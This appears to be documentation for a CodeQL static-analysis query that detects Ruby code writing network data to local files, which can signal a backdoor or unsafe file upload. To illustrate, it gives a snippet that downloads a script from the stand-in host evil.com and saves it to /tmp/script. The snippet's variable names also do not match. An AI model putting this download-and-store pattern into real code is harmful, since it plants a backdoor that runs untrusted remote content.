Network data written to file¶
ID: rb/http-to-file-access Kind: path-problem Severity: warning Precision: medium Tags: - security - external/cwe/cwe-912 - external/cwe/cwe-434 Query suites: - ruby-security-extended.qls - ruby-security-and-quality.qls
Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.
Examine the highlighted code closely to ensure that it is behaving as intended.
The following example shows backdoor code that downloads data from the URL
https://evil.com/script, and stores it in the local file
require "net/http" resp = Net::HTTP.new("evil.com").get("/script").body file = File.open("/tmp/script", "w") file.write(body)
Other parts of the program might then assume that since
/tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.